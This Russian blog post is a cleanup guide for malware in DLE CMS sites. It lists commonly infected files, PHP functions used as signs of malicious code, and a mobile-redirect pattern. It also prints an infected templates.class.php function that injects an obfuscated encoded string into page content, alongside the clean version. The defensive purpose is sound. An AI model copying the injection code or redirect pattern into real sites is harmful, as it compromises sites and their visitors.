Вторник, 21 Янв 2014 в 11:31

Вирусы в движке DLE

Автор: admin

DLE вирусы

Решил написать заметку про частые вирусы в движке DLE … За долгую жизнь в инете насмотрелся на них много…. Много нашёл и удалил, но народ у нас на редкость изобретателен. Для всех у кого такая беда…

Если вдруг Yandex или Google начинают кричать что на вашем сайте вирусы, то …. проверяем на наличие постороннего кода сперва  файлы .htccess и .…/templates/name/main.tpl . Чаще всего вирус или редирект там.

Есть ещё несколько  мест куда часто в движках прячут вирусы , их надо проверить и убрать лишнее:

  • index.php
  • engine/engine.php
  • engine/data/config.php
  • engine/data/dbconfig.php
  • engine/init.php
  • language/Russian/website.lng

Ищите использование характерных для вредоносного кода функций. Примеры таких функций для языка PHP:

  • динамическое исполнение кода (eval, assert, create_function);
  • обфускация (base64_decode, gzuncompress, gzinflate, str_rot13, preg_replace);
  • загрузка удаленных ресурсов (file_get_contents, curl_exec).

Частый код который встречается при мобильных редиректах —  …strpos($_SERVER[‘HTTP_USER_AGENT’],»Android»).. — когда пытаются определить тип браузера или мобильного устройства … а потом перекинуть на свой сайт .. header(‘Location: http://…..ws/’);

Ещё, для примера в  ../engine/templates.class.php  если нашли


function set($name, $var) {

if( is_array( $var ) && count( $var ) ) {
 foreach ( $var as $key => $key_var ) {
 $this->set( $key, $key_var );
 } } else /**/{/**/
 $this->data[$name] = $var;
 /**/
 if($this->templatename=="main.tpl"){
 if($name=="{content}"){
 $this->data[$name] .= $this->set_encode('@flr(gcxib=!flgjihx:wkwb;!#@h(avbd=!ac cj:%%cvhrbi-zh^wbc%!#cvhrbi-zh^wbc@%h#@%flr#');
 }
 }
 /**/
 }
 }

советую заменить на


function set($name, $var) {
 if( is_array( $var ) && count( $var ) ) {
 foreach ( $var as $key => $key_var ) {
 $this->set( $key, $key_var );
 }
 } else
 $this->data[$name] = $var;
 }

Что делать в случае если нашли что-то лишнее: удалить этот код (будьте внимательны при удалении, чтобы не удалить часть настоящего кода) и поставить на файлы атрибуты 444.

Ваш отзыв

Цитаты великих

"Верные слова не изящны. Красивые слова не заслуживают доверия. Добрый не красноречив. Красноречивый не может быть добрым. Знающий не доказывает, доказывающий не знает."

Лао-цзы

Я в Контакте